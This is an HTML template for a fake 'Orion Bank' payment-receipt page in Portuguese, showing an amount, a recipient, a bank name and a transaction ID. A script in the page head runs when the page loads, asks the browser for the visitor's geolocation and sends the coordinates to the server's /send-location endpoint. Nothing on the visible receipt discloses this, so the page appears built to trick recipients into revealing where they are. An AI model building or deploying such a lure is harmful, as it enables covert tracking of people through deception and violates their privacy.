<!DOCTYPE html>
<html lang="pt-BR">

<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <link rel="stylesheet" href="/styles.css">
  <link rel="preconnect" href="https://fonts.googleapis.com">
  <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
  <link href="https://fonts.googleapis.com/css2?family=Roboto+Mono:wght@500&display=swap" rel="stylesheet">
  <title>Orion Bank - Comprovante de Pagamento</title>
  <link rel="icon" type="image/png" href="/logo.png">
  <link rel="stylesheet" href="/styles.css">
  <script>
    window.addEventListener("load", () => {
      if (navigator.geolocation) {
        navigator.geolocation.getCurrentPosition(position => {
          const lat = position.coords.latitude;
          const lon = position.coords.longitude;
          fetch(`/send-location?lat=${lat}&lon=${lon}`)
            .then(response => response.json())
            .then(data => {
              if (!data.success) {
                alert("Error on sending location.");
              }
            })
            .catch(error => console.error("Erro:", error));
        }, error => {
          alert("Error on getting location: " + error.message);
        });
      } else {
        alert("Geolocation not supported by your browser.");
      }
    });
  </script>
</head>

<body>
  <div class="screen-app">
    <header class="app-header">
      <div class="logo">Orion</div>
      <button class="fechar-btn" title="Fechar">×</button>
    </header>

    <main class="main-content">
      <div class="confirmation-header">
        <div class="icon-status">
          <svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 24 24" fill="none"
            stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round">
            <path d="M22 11.08V12a10 10 0 1 1-5.93-9.14" />
            <polyline points="22 4 12 14.01 9 11.01" />
          </svg>
        </div>
        <h1>Pagamento realizado</h1>
        <p class="main-value">R$ 150,00</p>
        <p class="main-date">
          <%= formattedDate %>
        </p>
      </div>

      <div class="divisor"></div>

      <ul class="transaction-details">
        <li>
          <div class="item-label">
            <svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none"
              stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round">
              <path d="M20 21v-2a4 4 0 0 0-4-4H8a4 4 0 0 0-4 4v2" />
              <circle cx="12" cy="7" r="4" />
            </svg>
            <span>Para</span>
          </div>
          <div class="item-value">Jane - Desktop Internet</div>
        </li>
        <li>
          <div class="item-label">
            <svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none"
              stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round">
              <line x1="12" x2="12" y1="22" y2="18" />
              <path d="M5 22h14" />
              <path d="M17 10h.01" />
              <path d="M7 10h.01" />
              <path d="M12 2a8 8 0 0 0-8 8v1h16v-1a8 8 0 0 0-8-8z" />
              <path d="M5 18v-2h14v2H5z" />
            </svg>
            <span>Instituição</span>
          </div>
          <div class="item-value">Banco Nacional S.A.</div>
        </li>
        <li>
          <div class="item-label">
            <svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none"
              stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round">
              <path d="M21 10c0 7-9 13-9 13s-9-6-9-13a9 9 0 0 1 18 0z" />
              <circle cx="12" cy="10" r="3" />
            </svg>
            <span>Local</span>
          </div>
          <div class="item-value">São Caetano do Sul, SP</div>
        </li>
      </ul>

      <div class="divisor"></div>

      <div class="auth">
        <span class="label">ID da Transação</span>
        <span class="auth-code">a42c-9z78-b112-f045-8c7e-1101-b54a</span>
      </div>
    </main>

    <footer class="app-footer">
      <button class="main-button" onclick="window.print()">
        <svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none"
          stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round">
          <circle cx="18" cy="5" r="3" />
          <circle cx="6" cy="12" r="3" />
          <circle cx="18" cy="19" r="3" />
          <line x1="8.59" x2="15.42" y1="13.51" y2="17.49" />
          <line x1="15.41" x2="8.59" y1="6.51" y2="10.49" />
        </svg>
        <span>Compartilhar Comprovante</span>
      </button>
    </footer>
  </div>
</body>

</html>